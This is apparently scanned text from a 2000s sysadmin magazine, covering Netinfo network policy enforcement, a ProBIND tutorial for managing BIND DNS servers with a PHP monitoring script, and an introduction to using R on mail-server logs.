appear there. This is done by inserting
Interface-MAC and IP-Interface associations
in the appropriate tables and by setting
two flags that say that this interface should
serve only the associated IPs and MACs.

Detecting Violations 

Now we can validate our existing (and
future) IP:MAC:Interface triples against our
policy and find out about intruders (Figure
6). Using PostgreSQL capabilities, we can
create functions and views that return the
violations with a single SELECT statement.
Most of the job is done within the database
schema using functions and custom views,
so the user interface only needs to present the results.
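
The article performs this check inside PostgreSQL. The logic alone can be sketched outside the database as follows, assuming each of the six rule directions is stored as a mapping from an entity to the set of values it permits. The rule names and data layout are hypothetical.

```python
def violations(observed, rules):
    """Return (triple, rule name) for every observed triple that breaks a rule.

    observed is a list of (ip, mac, interface) triples. rules holds up to
    six mappings, one per direction; a missing key means "no restriction".
    """
    # (rule name, index of restricting entity, index of restricted entity)
    checks = [
        ("ip_mac", 0, 1), ("mac_ip", 1, 0),
        ("mac_if", 1, 2), ("if_mac", 2, 1),
        ("ip_if", 0, 2), ("if_ip", 2, 0),
    ]
    found = []
    for triple in observed:
        for name, src, dst in checks:
            allowed = rules.get(name, {}).get(triple[src])
            if allowed is not None and triple[dst] not in allowed:
                found.append((triple, name))
    return found
```

An entity without a rule imposes no restriction, so only entities that the administrator has explicitly constrained can produce violations.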

Policy Enforcement 

All violations are associated with the
MAC address that corresponds to the user
who violated the policy. If we're going to
enforce the policy, we will need to revoke
network access from users who committed
violations. To do this, we create another
table named “blacklist”, which holds
the MAC addresses of users in violation of
policy and possibly a reason. This table is
populated as the final phase of the collection.
It can also be populated by
hand so that the administrator can manually
lock out a user.

To perform actions on Cisco devices,
we must telnet to them and perform an
“enable”. So, we need to know the telnet
username/password and the enable password.
The device table is extended to hold
this information.

Now, we have come to a point where we
want to lock out users from our network.
We can do this by shutting down their
switch ports, but that is not acceptable when
there is more than one user behind each
port. We need to add a kind of access list on
those devices to prevent the offending users from
accessing the network. Cisco switches can have a
list of MAC addresses that are allowed
behind each port (known as the “mac-address-table”),
which can be configured
from the command prompt. For security reasons,
we also don't consider adding MAC
address tables to interfaces that are known
to have other monitored network devices
connected.

Locking out users can introduce problems,
so we want to restrict this as much as
possible. We want to detect policy violations,
but we want to perform policy
enforcement only in some places. Thus, we
need to flag interfaces that will be accessed
during policy enforcement by introducing a
new flag for each interface. We also add a
flag for each monitored network device so
that we can disable policy enforcement on a
device as a whole.

There are two policy enforcement methods
to be applied:

• On interfaces where we only allow a specific
MAC address, we create a MAC
address table and configure it without
waiting for a violation to happen. If there
is a user in this MAC address table who
committed a violation, then his or her
MAC address will be removed during the
next run.

• On all other interfaces, we wait for a policy
violation to happen. Then we can get
a list of all the known MAC addresses
existing behind a given interface and add a MAC address table to
it containing all those MACs except the violators'. This is a
great relief for network administrators because they don't need to
know which MAC addresses are behind each interface. After the
MAC address table is added to the configuration, only those users
will be able to access the network.

Figure 6 Policy violations
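
The second method can be sketched as a planning step that decides, per interface, which MAC addresses the new table should permit. The sketch honors the per-interface enforcement flag and skips interfaces with another monitored device behind them. The field names enforce and has_netdev are hypothetical, and no device commands are generated here.

```python
def enforcement_plan(interfaces, macs_by_iface, blacklist):
    """Map each enforceable interface that has a violator to its permitted MACs.

    interfaces maps an interface name to its flags, macs_by_iface maps it to
    the MAC addresses currently known behind it, and blacklist lists the MAC
    addresses of violators.
    """
    banned = {m.lower() for m in blacklist}
    plan = {}
    for iface, info in interfaces.items():
        if not info.get("enforce") or info.get("has_netdev"):
            continue  # enforcement disabled, or another monitored device is behind it
        seen = {m.lower() for m in macs_by_iface.get(iface, ())}
        if seen & banned:
            plan[iface] = sorted(seen - banned)
    return plan
```

Interfaces without a blacklisted MAC address are left out of the plan, so nothing is configured on them until a violation is actually detected.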

A policy enforcement tool can be created using simple shell script
commands. I've created a simple shell+expect script that reads data
from the blacklist table and tries to enforce the policy as follows:

• It determines which devices require locking.

• For each device, it telnets and removes the old configuration.
Then it creates the new one.

In fact, the script tries to be a little more clever: it creates a list of
expect scripts on each run, then compares that list with the previous
one and runs only if there is a change. It will also run if a certain
amount of time has passed. This way there will be no extra load
on switches.
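
The run-only-when-needed decision can be sketched as follows. The author's tool is a shell+expect script; this Python version illustrates only the comparison logic, using a SHA-256 digest of the generated scripts as the "previous list". The function name and parameters are hypothetical.

```python
import hashlib


def should_run(scripts, previous_digest, last_run, now, max_age):
    """Return (run, digest) for the freshly generated expect scripts.

    scripts maps a device name to the text of its generated script. The
    tool runs when the digest differs from the previous one or when
    max_age seconds have passed since the last run.
    """
    h = hashlib.sha256()
    for name in sorted(scripts):
        h.update(name.encode())
        h.update(b"\0")
        h.update(scripts[name].encode())
        h.update(b"\0")
    digest = h.hexdigest()
    changed = digest != previous_digest
    stale = (now - last_run) >= max_age
    return (changed or stale), digest
```

The caller would store the returned digest and the time of the run, and pass both back in on the next invocation.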

Data Expiration 

One tricky aspect is knowing when to remove entries from the 
database. We have the current image and a history table. We also 
have rules, notes, and descriptions that can become outdated in a 
couple of years. Discovered MAC addresses may not be needed 
after a couple of months. 


To ease the administration of such a system, we expire data
based on timestamps. If after X months MAC address M is no
longer being used, we can remove it from the system. At this time,
we can also remove any policy data associated with the address.
After all, if the address is being purged, we no longer care that it’s
owned by user “Goofy” or bound to a particular IP address or port.
This simple timeout algorithm goes a long way toward making
the tool self-maintaining. With this approach, even for very large
networks (say 100,000 MAC addresses) that are monitored for a
couple of years, the database will not become very large and
performance will remain good.
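
The timeout rule can be sketched as follows, assuming the discovered MAC addresses and their policy data are held in two dictionaries keyed by MAC address. The names are hypothetical, and the real system stores this data in PostgreSQL.

```python
def expire(macs, policy, now, max_age):
    """Drop MAC addresses not seen for more than max_age seconds.

    macs maps a MAC address to its last-seen timestamp; policy maps a MAC
    address to any policy data attached to it. Policy data is purged
    together with the address. Returns the list of removed addresses.
    """
    stale = [mac for mac, ts in macs.items() if now - ts > max_age]
    for mac in stale:
        del macs[mac]
        policy.pop(mac, None)
    return stale
```

Collecting the stale addresses first and deleting afterwards avoids modifying the dictionary while it is being iterated.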

For a sample of 58 monitored network devices, we have found
1400 interfaces. There are about 2100 unique IP addresses and 2600
known MAC addresses. There are more MAC addresses than IP
addresses because the switches have a lot of internal MACs (at least
one for each interface), and there are other (not monitored)
switches, too.

In case of malicious activity where someone tries to fill the mac-address-table
by flooding the network with fake MAC addresses to
make sniffing possible, a lot of new MAC addresses will be discovered.
In one such case, there were more than 30,000 MAC addresses
reported for a switch port and stored in the database. Because of the
expiry, however, those entries were auto-removed a couple of
months later.

The database access should be pretty fast even for very large
networks. On a P3/866, it takes about 400 ms to combine all the
data and produce a complete current view from within a quite
complex PostgreSQL view (using “explain analyze select * from
view current” in the Netinfo database).



Netinfo 

The algorithm and implementation described here are included in
Netinfo v3.0, which is free software distributed under the General
Public License. In fact, Netinfo does some more complex computations
and provides other (not well-tested) functions like “Hunting”,
which can be used to insert rules for interfaces that have monitored
network devices connected to them. These rules can then be auto-applied
to all interfaces of all monitored network devices existing
behind this interface.

The whole idea has gone through a lot of stages of patching and
rewriting, and I consider it to be very stable. At first, this method
was created as a monitoring tool to map IPs, MACs, and interfaces
for the Technological Education Institute of Thessaloniki in Greece.
Later, it was extended to have a history and hold some policy rules
and to perform user lock-out. Then, it was rewritten from scratch to
resolve database management and performance issues (and more).

An administrator can add descriptions to subnets, IPs, MACs, or
interfaces, which will be shown on each view. The program also
knows about NIC vendors and determines them from the MAC
address prefix.
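
Vendor detection from the MAC address prefix can be sketched as a lookup on the first three octets. The two-entry table below is a sample for illustration only; a real tool would load a full vendor prefix list. The function name is hypothetical.

```python
# Sample prefix table for illustration; a real deployment would load a full list.
OUI = {
    "000347": "Intel Corporation",
    "001083": "Hewlett-Packard Company",
}


def vendor(mac):
    """Return the vendor name for a MAC address, or "unknown"."""
    digits = "".join(c for c in mac.lower() if c in "0123456789abcdef")
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return OUI.get(digits[:6], "unknown")
```

Stripping separators before the lookup lets the same function accept colon-separated, dash-separated, and unseparated notations.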

Stefanos Harhalakis is a graduate of the Department of Informatics of the
Technological Educational Institute (TEI) of Thessaloniki, Greece. He works
as a Systems and Network Administrator for the Dept. of Informatics and provides
support to the Institute's NOC, and his activities include development of
C/C++ applications and facilities for network security and monitoring.
Stefanos can be reached at: vl3@it.teithe.gr.
NETWORKING


BIND Management Using ProBIND 

Mark Barrow 


I was recently hired to sort out the management of a client's BIND
DNS servers. They had deployed multiple BIND DNS servers
running on Solaris to serve both internal and external DNS for
themselves as well as primary and secondary DNS services for
many of their customers. The current solution involved editing the
zone files on each master server (Internal/External), then reloading
the DNS into a test namespace to check for errors (using nslookup,
etc.) before deploying to the production namespace and running a
Perl script to reload all of the
servers. Although the solution was extremely stable,
skilled sys admins had to spend a lot of time managing
it. They wanted a
solution that could be maintained
by other office staff.

I was asked to investigate GUI-based
management products that
could replicate this functionality and
decrease the sys admins’ workload.

Furthermore, the client wanted to
stick with BIND because it had been
extremely stable in production. This
is how I encountered ProBIND,
which seemed to fit the bill perfectly.

ProBIND is an open source
PHP/MySQL-based Web application
that can be used to distribute DNS
data to multiple BIND 8/9-based DNS servers. It is currently maintained
by Alexi Roudnev at: http://probind2.sourceforge.net.

ProBIND holds all the data on zones and servers in a central 
MySQL database. This is a one-way relationship, which means that if 
you currently use BIND you will need to import the current data first. 
However, it’s very easy to add new servers or rebuild failed ones. 

Benefits of Using ProBIND 

ProBIND is an easy-to-use Web interface that can be used to
manage multiple BIND servers and namespaces. ProBIND can
automatically populate your reverse zones as new records are
added. With the Perl Net::DNS module, ProBIND can be used to check
the servers. All data is held in a central database, simplifying the
backup process for multiple DNS servers. ProBIND can be configured
to authenticate users and provides granular access through
DNS-Admin or DNS-User roles.
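
To illustrate what populating a reverse zone involves, the following sketch derives the PTR record that corresponds to a new address record. It uses Python's standard ipaddress module and is not ProBIND's own PHP code; the function name is hypothetical.

```python
import ipaddress


def ptr_record(hostname, address):
    """Return the (owner name, target) pair of the PTR record for an address record."""
    owner = ipaddress.ip_address(address).reverse_pointer
    target = hostname if hostname.endswith(".") else hostname + "."
    return owner, target
```

For example, adding www.example.com with address 192.168.1.2 would call for a PTR record owned by 2.1.168.192.in-addr.arpa that points to www.example.com.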

The Solution 

For the purposes of this article, the DNS infrastructure consists 
of three external servers (two secondary and one hidden primary) 
and two internal DNS servers (one primary and one secondary). See 
Figure 1. 


ProBIND was installed onto the external hidden master DNS
server. This was firewalled so that only the two external secondary
servers were directly accessible from the Internet, and only DNS
queries from the external secondary servers would be accepted
through to the hidden primary server. ProBIND was configured to
manage the two external secondary servers and the local primary in
the external namespace together with a primary and secondary in
the internal namespace. The test namespace was configured, but no
servers were assigned because it
was used purely for user testing.
Note that ProBIND and the database
it uses could have been
installed on separate machines.
However, as ProBIND uses minimal
resources, both were installed onto
the current hidden master.

ProBIND displays the DNS data
as it is in the database rather than
querying the servers directly. The
ProBIND GUI can be used to do
almost anything that was previously
only available through the command
line.

When you have finished editing,
selecting PUSH from the GUI runs
a PHP script that generates the
BIND config files and zone files
locally, uses rsync over SSH to copy these to the master servers
(secondary servers only get the config files), and then reloads all the
servers (using rndc over SSH). There is also an option to PUSH all
data, which is useful if the servers have somehow gone out of sync
or when recovering a failed server.

Prerequisites 

In order for ProBIND to function correctly, it's necessary to 
install the following prerequisite software: 

• MySQL (3.23 and above).

• Apache (1.3 and above).

• PHP (4.0 and above): register_globals needs to be on, and PHP
needs to be able to run from the command line as well as through
the Apache module.

• Rsync (2.61 and above): used to replicate to remote BIND
servers.

• Perl 5.

• Perl Net::DNS.

• SSH.

Installing ProBIND 

The latest version of ProBIND (2.01 at the time of writing) can
be downloaded from http://probind2.sourceforge.net, but first
install the prerequisites. The ProBIND distribution contains more
detailed installation instructions; see Install.txt.

It is recommended that you install ProBIND in /var/ProBIND
and then link to it from your Web root. To manage both internal and
external DNS using ProBIND, you must install three instances of
ProBIND (internal namespace, external namespace, and a test
namespace for trying things out):

mkdir /var/ProBIND
cd /var/ProBIND
#copy the downloaded probind tar-ball to here
gunzip ProBIND2.0-build1.tar.gz
tar xvf ProBIND2.0-build1.tar
mv probind internal
tar xvf ProBIND2.0-build1.tar
mv probind external
tar xvf ProBIND2.0-build1.tar

ProBIND comes with a basic html front page that can be used to
manage the multiple namespaces. To use this:

cd /var/ProBIND
cp probind/parent/* .
ln -s probind/images images

This default front page has a space for inserting your own DNS-monitoring
utility. If you don't have one, see Listing 1, which can
be run from cron as the user that owns the doc root.

On the ProBIND host, Apache needs to run as the same user that
will SSH to the remote servers. In my case, I created a user called
probind, under which the Web server runs and which can SSH without
a password to all DNS servers and reload BIND. Create
ProBIND working directories (used by ProBIND to generate config
and zone files prior to copying to servers) and allow the Web server
to write to them.

Carry out the following in each namespace:

mkdir HOSTS
mkdir LOGS
chown probind HOSTS LOGS

Create a .htaccess file in each of these directories to enable the Web
server to list the contents. Without this, it is likely you will be
unable to navigate and view the BIND zone files stored in the local
file system that ProBIND rsyncs to the local and remote servers:

cat > HOSTS/.htaccess
Options Indexes
FancyIndexing on
^D

cat > LOGS/.htaccess
Options Indexes
FancyIndexing on
^D

Set up the initial MySQL database and ProBIND user (note password
in “identified by”):

/usr/local/mysql/bin/mysql -u root -p
create database extdns;
grant select,insert,update,delete on extdns.* to 'pbext'@'localhost' identified by 'password';
quit

Initialize the database from the ProBIND SQL file:

/usr/local/mysql/bin/mysql -u root -p extdns < etc/mktables.sql

Edit inc/config.inc to match your details. For example:

$TOP = "/var/ProBIND/extdns";
$TMP = "/tmp";
$MYSQL_HOST = "localhost";
$MYSQL_DB = "extdns";
$MYSQL_USER = "pbext";
$MYSQL_PASSWD = "password"; // Set up password here
$NAME_SPACE = "EXTERNAL";

Figure 1 Example DNS infrastructure (diagram notes: ProBIND pushes DNS config to the internal master and slaves; customer slave DNS servers update their zone files by polling buslogics external slaves; external secondaries update their zone files by polling customers' primary servers, after initial slave zone setup from ProBIND)

To avoid having to add /usr/local/bin to the
path on all the remote servers (it is not
usually set in Solaris), edit the shell script
sbin/push.remote. Change the lines:

RSYNC="-b -p -t -r \
--exclude='*.b,CVS,SEC,*.pid' \
--cvs-exclude --suffix=.bek"

User=named

to:

RSYNC="rsync --rsync-path=/usr/local/bin/rsync \
-b -p -t -r --exclude='*.b,CVS,SEC,*.pid' \
--cvs-exclude --suffix=.bek"

User=probind

Pushing DNS updates to the servers

Figure 3 Pushing changes to target servers

Configure the ProBIND GUI

Use your browser to navigate to
http://probindservername/probind and
repeat the following for each namespace you
manage.

Click the “Misc. tools” link in the top
frame, then select “Settings” in the sub-menu.
Change the settings to reflect your site. In my
client’s configuration, we set slave_on_slaves
and two_step_update to “on”.

Create new template directories for master
and slave servers (or set up a directory for
each server if you want different configurations
on each):

mkdir /var/ProBIND/extdns/templates/Master
mkdir /var/ProBIND/extdns/templates/Slave

For BIND version 9 servers:

cp /var/ProBIND/extdns/templates/v9-master \
/var/ProBIND/extdns/templates/Master
cp /var/ProBIND/extdns/templates/v9-slave \
/var/ProBIND/extdns/templates/Slave

Edit rndc.conf and named.conf to make sure
that the key used by BIND rndc to control the
servers matches.

For BIND version 8 servers:

cp /var/ProBIND/extdns/templates/v8-master \
/var/ProBIND/extdns/templates/Master
cp /var/ProBIND/extdns/templates/v8-slave \
/var/ProBIND/extdns/templates/Slave



Listing 1 Simple DNS monitoring script

#!/usr/local/bin/php
<?php
/*
Simple DNS monitoring script for use with ProBIND.
This script generates HTML which can be used to overwrite blank.html
in the ProBIND directory.
For best results run from cron and redirect output to blank.html.
Author: Mark Barrow, mark.barrow@blconsulting.co.uk
*/

// Replace the below with your server IP addresses.
$servers = array("192.168.1.2", "192.168.1.3", "192.168.12.1",
                 "10.10.1.1", "10.10.1.2");

// Replace the below with the DNS name you want to run tests against.
$name = "www.blconsulting.co.uk";

// Returns true if dig got an answer from $server; the raw dig output
// is left in the global $result for the error column.
function checkDNSServer($server, $name)
{
    global $result;
    // Reset to an empty array so exec() does not append to earlier output.
    $result = array();
    exec("/usr/sbin/dig @$server $name", $result);
    foreach ($result as $line) {
        if (preg_match("/Got answer:/i", $line)) {
            return true;
        }
    }
    return false;
}
?>
<HTML><TITLE>Blank</TITLE>
<BODY bgcolor="#AAAA77">
<p align="right"><a href="help.html"><font face="Arial, Helvetica,
sans-serif" size="-4">help</font></a>&nbsp;</p>

<p align="center">&nbsp;</p>
<p align="center"><font face="Arial, Helvetica, sans-serif"><b>
<font size="5">DNS Server Status</font></b></font></p>
<p align="center"><font size="2" face="Arial, Helvetica,
sans-serif">(Run as cron job against /var/ProBIND/dns.php)</font></p>
<TABLE border="4" align=center width="70%">
<tr><td><b>Server Address</td><td><b>Last Checked</td><td>
<b>Error Output</td></tr>
<?php
foreach ($servers as $server) {
    $output = checkDNSServer($server, $name);
    if ($output == true) {
        echo "<tr><td valign='top'>server $server is alive</td>
              <td valign='top'>" . date("l dS of F Y h:i:s A") .
             "</td><td valign='top'>&nbsp;</td></tr>";
    }
    else {
        echo "<tr><td valign='top'><font color=#FF0000>server
              $server is dead</font></td><td valign='top'>
              <font color=#FF0000>Last Checked " .
             date("l dS of F Y h:i:s A") . "</font></td>";
        echo "<td valign='top'><font color=#FF0000>";
        // Show the raw dig output as the error text.
        foreach ($result as $line) {
            echo $line;
        }
        echo "</font></td></tr>";
    }
}
echo "</table>";
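
The check at the heart of Listing 1 (run dig against a server and look for "Got answer:" in its output) can also be sketched in Python. This is only an illustration of the same idea, not part of ProBIND; the function names, the default dig path, and the timeout value are assumptions made for the example.

```python
import subprocess


def got_answer(dig_output_lines):
    """Return True if any line of dig output contains 'Got answer:'."""
    return any("got answer:" in line.lower() for line in dig_output_lines)


def check_dns_server(server, name, dig="/usr/sbin/dig", timeout=10):
    """Query one server with dig; return (alive, output_lines).

    The dig path and timeout are assumptions; adjust them for your site.
    """
    try:
        proc = subprocess.run(
            [dig, f"@{server}", name],
            capture_output=True, text=True, timeout=timeout,
        )
    except (OSError, subprocess.TimeoutExpired) as exc:
        # dig missing or hung: report the server as dead with the reason.
        return False, [str(exc)]
    lines = proc.stdout.splitlines()
    return got_answer(lines), lines
```

Keeping the text test (got_answer) separate from the process call makes it possible to check the matching logic without a live DNS server.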
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The file named.tmpl in the above directories is used by ProBIND to 
generate named.conf at push time. If you have any specific settings 
regarding logging, etc., add these to named.tmpl. 

Configure Servers 

Navigate to http://probindserveraddress/probind. For each
namespace, select “Misc. tools” from the tab menu, then select
“Servers” from the sub-menu. Select “Add another Server”.

Update the settings for each of the servers you want to control
with ProBIND. If you intend to use a hidden master configuration,
you need to set the NS record to “Skip” for the hidden master
server to prevent the hidden master NS record from being published
in the DNS.

Once the server is set up, a link to this server should appear on
the servers screen. Clicking on this link will allow you to set
specific options per server in ProBIND rather than having to manually
edit the named.tmpl file.


Using ProBIND 

Use of ProBIND is pretty straightforward. For instance, editing
zones is simply a case of clicking on the zone listed on the left-hand
side, as shown in Figure 2. Once you have made the required changes,
select “Push Updates”. You can review the changes before
sending them to each server by clicking on the named.conf or file links
under “View”, perform nslookup queries against each server using
“Test”, or push the changes to all or individual servers by clicking
on “Start Update” (Figure 3).

Customizations 

During the implementation, I discovered that there was no easy
way to get ProBIND to copy per-zone options to secondary servers
(although this worked fine for the primaries). Because this was a
requirement for the client, I wrote a patch for ProBIND to support
it. If you are interested in this patch, just send me an email and I’ll
share it.


Import Script Caveats 

ProBIND includes an import script to allow you to import an
existing configuration. However, ProBIND cannot support the include
statement within named.conf, which means a new named.conf must be
created from the concatenation of masters.conf and slaves.conf.

During evaluation, a bug was discovered in that the import script
fails if the named.conf uses the following (correct) format:

zone "blconsulting.co.uk" in {
    type master;
    file "master/db.blconsulting.co.uk";
    allow-transfer { blc-slaves; };
};

Mark Barrow is a Senior Technical Consultant specializing in
UNIX/eCommerce working for Business Logic Consulting LTD. He can be
contacted at: mark.barrow@blconsulting.co.uk.


Download Sys Admin code from:

www.sysadminmag.com or ftp.mfi.com


To work around this, edit and replace with this:

zone "blconsulting.co.uk" {
    type master;
    file "master/db.blconsulting.co.uk";
    allow-transfer { blc-slaves; };
};
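
If the old named.conf holds many zones, the same workaround can be applied mechanically. The sketch below is an assumption about how one might do it, not something shipped with ProBIND: it removes the optional class keyword "in" from each zone statement and leaves everything else alone. The function name strip_zone_class is hypothetical.

```python
import re

# Matches a zone statement that carries the optional class keyword,
# e.g.   zone "example.com" in {
ZONE_WITH_CLASS = re.compile(
    r'^([ \t]*zone[ \t]+"[^"]+")[ \t]+in[ \t]*\{',
    re.IGNORECASE | re.MULTILINE,
)


def strip_zone_class(conf_text):
    """Rewrite 'zone "name" in {' as 'zone "name" {' throughout the text."""
    return ZONE_WITH_CLASS.sub(r"\1 {", conf_text)


if __name__ == "__main__":
    sample = 'zone "blconsulting.co.uk" in {\n    type master;\n};\n'
    print(strip_zone_class(sample))
```

Run it over a copy of the file and compare the result with the original before importing.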

The data is then imported as follows:

cd /var/ProBIND/extdns/etc
./import -v -a -d /path to old named.conf/named.conf

The import also imports the zone options. For example, if you set
allow-transfer {slave-servers;};, where slave-servers is an
alias for all your slave servers, the name “slave-servers” must be
changed after import to {$ACL}. ($ACL gets converted by
ProBIND to the IP addresses of each server managed by ProBIND
at push time.) The easiest way to do this is by using an SQL query.
For example:

/usr/local/mysql/bin/mysql -u root -p extdns

mysql> update zones set options='allow-transfer {$ACL};'
    -> where options like '%slave-servers%';

Query OK, 38 rows affected (0.00 sec)

Rows matched: 38 Changed: 38 Warnings: 0
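
Before running an update like this against the live database, it can help to rehearse it on throwaway data. The sketch below uses Python's built-in sqlite3 module as a stand-in for MySQL. The zones table and options column come from the query above; the domain column and the sample rows are assumptions invented for the example, since the real ProBIND schema is not shown here.

```python
import sqlite3

# In-memory stand-in for the extdns database (assumed, simplified schema).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE zones (domain TEXT, options TEXT)")
conn.executemany(
    "INSERT INTO zones VALUES (?, ?)",
    [
        ("blconsulting.co.uk", "allow-transfer {slave-servers;};"),
        ("example.org", "allow-transfer {slave-servers;};"),
        ("example.net", ""),  # zone without per-zone options
    ],
)

# Same statement as in the text, with the values passed as parameters.
cur = conn.execute(
    "UPDATE zones SET options = ? WHERE options LIKE ?",
    ("allow-transfer {$ACL};", "%slave-servers%"),
)
changed = cur.rowcount
conn.commit()

remaining = conn.execute(
    "SELECT COUNT(*) FROM zones WHERE options LIKE '%slave-servers%'"
).fetchone()[0]
print(changed, "rows changed;", remaining, "rows still use the alias")
```

The final count is a quick way to confirm that no zone still refers to the old alias.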
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TOOLS 


Using the R System for Systems 
Administration 

Mihalis Tsoukalos


This article is about R, which is an advanced statistical
package with many complex capabilities. However, don’t
be afraid of R if you aren’t very comfortable with mathematics
and statistics. This article will cover some simple, useful
capabilities of the package tailored for systems administrators.

R is a GNU project based on S, which is a statistics-specific language
and environment developed at AT&T Bell Labs. R is an
interpreted computer language. The R system distribution supports
many statistical procedures including linear and generalized linear
models, nonlinear regression models, time series analysis, classical
parametric and nonparametric tests, clustering, and smoothing.
The current version of R is 2.0.0, which was released on October
4, 2004. For more information, visit the R Project home page
(http://www.r-project.org).

There is also a commercial implementation of S, called S-PLUS
(http://www.insightful.com/), which has more facilities and
capabilities than R. The examples presented in this article can
also run in S-PLUS with little or no modification.

Running the R System 

R runs on Unix/Linux variants as well as on Windows. R can also run
on Mac OS X Panther. There are GUIs for R, but all you need for the
purposes of this article is the command-line version. The examples in
this article were written using R on Mac OS X Panther and Debian Linux.

To run R, type R (assuming that the R binary is in your PATH),
which will show something like the following:

racoon:~/code/R $ R

R : Copyright 2004, The R Foundation for Statistical Computing
Version 1.9.0 (2004-04-12), ISBN 3-900051-00-3

R is free software and comes with ABSOLUTELY NO WARRANTY.
You are welcome to redistribute it under certain conditions.
Type 'license()' or 'licence()' for distribution details.

R is a collaborative project with many contributors.
Type 'contributors()' for more information and
'citation()' on how to cite R in publications.

Type 'demo()' for some demos, 'help()' for on-line help, or
'help.start()' for a HTML browser interface to help.
Type 'q()' to quit R.

[Previously saved workspace restored]

To quit R, just type q() at the prompt.

Basic Commands of the R System

First, the commands for inserting, naming, and selecting data are
presented. The following example creates a data set (actually a vector)
called SYSADMIN. This data set contains the 0th to 6th powers of
the number 3. To view the data in an existing data set, just type its
name at the R prompt:

> SYSADMIN <- 3^(0:6)
> SYSADMIN
[1]   1   3   9  27  81 243 729
>

The notation 0:6 returns a sequence from 0 to 6, including 0
and 6, which is a total of seven numbers. The names() command
allows you to access the elements of a vector by a given name. In this
example, the numbers 0 to 6 are used:

> names(SYSADMIN) <- 0:6
> SYSADMIN
  0   1   2   3   4   5   6
  1   3   9  27  81 243 729
> class(SYSADMIN)
[1] "numeric"

If you want to remove the names you gave to the elements of the
vector with the names(SYSADMIN) command, you can use the following
command:

names(SYSADMIN) <- NULL

The following lines show the advantages of calling a vector by 
name: 
Figure 2 pairs(MAILDATA) output


Figure 3 hist(Delay, ...) output


A Mail Server Application 

Log files from a Postfix mail server are
going to be used in this simple application.
The data of interest in the log files includes
the main DNS domain (.gr, .com, etc.) of
the outgoing mail address, the delay duration
(in seconds), and the time of day (in
HH:MM:SS format). For getting
the data, grep, sed, and awk were used.
(Perl or another scripting language could have
been used instead.) The first 10 lines of the
data, including the column titles, are shown
in Table 2.
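
The extraction step described above can be sketched in Python instead of grep, sed, and awk. This is an illustration, not the commands used for the article: the sample log line is an assumed example of a typical Postfix smtp delivery record, and the regular expression and the function name parse_line are hypothetical.

```python
import re

# Assumed shape of a Postfix delivery line:
#   Oct  4 11:07:12 host postfix/smtp[1234]: QUEUEID: to=<user@dom.tld>, ..., delay=3, status=sent
LINE_RE = re.compile(
    r"^\w{3}\s+\d+\s+(?P<time>\d{2}:\d{2}:\d{2})\s.*?"
    r"to=<[^>@]+@(?P<host>[^>]+)>.*?\bdelay=(?P<delay>\d+(?:\.\d+)?)"
)


def parse_line(line):
    """Return (time, top-level domain, delay in seconds) or None."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    tld = m.group("host").rsplit(".", 1)[-1].lower()
    return m.group("time"), tld, float(m.group("delay"))


if __name__ == "__main__":
    sample = (
        "Oct  4 11:07:12 mail postfix/smtp[1234]: 3F2A1B7: "
        "to=<someone@example.gr>, relay=mx.example.gr[192.0.2.10], "
        "delay=3, status=sent (250 OK)"
    )
    print("Time Domain Delay")
    print(*parse_line(sample))
```

Printing one whitespace-separated record per line, under a header row of column titles, gives a file that R can load as a data set.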

Extracting Information 

What information can we get from the
data using R? Summary information (using the
summary() command) can be extracted,
which in this particular case gives:

> summary(MAILDATA)
       Time       Domain         Delay
 11:07:12:  5    au :  3    Min.   :  1.00
 08:51:05:  3    com: 10    1st Qu.:  2.00
 13:23:47:  3    edu:  2    Median :  3.00
 06:12:53:  2    gr :117    Mean   : 11.38
 16:42:34:  2    org: 11    3rd Qu.:  6.00
 00:52:50:  1    uk :  2    Max.   :217.00
 (Other) :129


This tells us that most of our emails go to
the .gr domain and that the busiest
moment (relatively busy, because those log
files were from my home dial-up server) is
11:07:12. Instead of Time, you can use
Day, Week, Month, or even Year variables
for getting mail information. The fact that
the “3rd Qu.” value is very close to the
Median means that there are no major
delays in sending outgoing messages,
at least for 75% of the
items in the data set. If you want more
precise information, you can divide the
data set into smaller data sets.

Output Explanation 

The Time and Domain data are not
numbers, so R counts the occurrences of each
value (considering each value as a string)
and prints the most frequent ones. As far
as Delay (which is numeric) is concerned,
R calculates and displays the following six
values:

• Min. - This is the minimum value of the
data set.

• Median - This is an element that divides
the data set into two subsets (left and
right subsets) with the same number of
elements. If the data set has an odd number
of elements, then the Median is part
of the data set. On the other hand, if the
data set has an even number of elements,
then the Median is the mean value of the
two center elements of the data set.

• 1st Qu. - The 1st Quartile q1 is a value,
not necessarily belonging to the data set,
with the property that (at most) 25% of
the data set values are smaller than q1
and (at most) 75% of the data set values
are bigger than q1. You can consider it as
the Median of the left half subset of the
sorted data set. In the case that the number
of elements of the data set is such that
q1 does not belong to the data set, it is
produced by interpolation of the two values
at the left (v) and the right (w) of its
position in the sorted data set as:

q1 = 0.75 * v + 0.25 * w

• Mean - This is the mean value of the
data set (the total sum divided by the
number of items in the data set).

• 3rd Qu. - The 3rd Quartile q3 is a value,
not necessarily belonging to the data set,
with the property that (at most) 75% of
the data set values are smaller than q3
and (at most) 25% of the data set values
are bigger than q3. You can consider it as
the Median of the right half subset of the
sorted data set. In the case that the number
of elements of the data set is such
that q3 does not belong to the data set, it
is produced by interpolation of the two
values at the left (v) and the right (w) of
its position in the sorted data set as:

q3 = 0.25 * v + 0.75 * w

• Max. - This is the maximum value in
the data set.

Please note that many definitions
for finding Quartiles exist. If you
try another statistical package, you may
get different results.

Referring back to the example, the fact
that the 3rd Qu. value is very close to the
Median means that there are no major
delays in sending outgoing
messages, at least for 75% of
the items in the data set. If you want
more precise information, you can divide
the data set into smaller data sets.
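
The six values can be reproduced by hand. The sketch below is a Python illustration, assuming the linear-interpolation rule that R's quantile() function uses by default (its "type 7" definition); the function names and the six sample delays are made up for the example. With six values, the interpolation weights come out as 0.75/0.25 for q1 and 0.25/0.75 for q3, as in the formulas above; other data set sizes give other weights.

```python
def quantile(sorted_values, p):
    """Quantile by linear interpolation between neighbouring sorted values."""
    n = len(sorted_values)
    h = (n - 1) * p                 # fractional 0-based position
    lo = int(h)                     # index of the left neighbour (v)
    hi = min(lo + 1, n - 1)         # index of the right neighbour (w)
    frac = h - lo
    v, w = sorted_values[lo], sorted_values[hi]
    return v + frac * (w - v)


def six_number_summary(values):
    """Return the six values that summary() prints for a numeric column."""
    data = sorted(values)
    return {
        "Min.": data[0],
        "1st Qu.": quantile(data, 0.25),
        "Median": quantile(data, 0.50),
        "Mean": sum(data) / len(data),
        "3rd Qu.": quantile(data, 0.75),
        "Max.": data[-1],
    }

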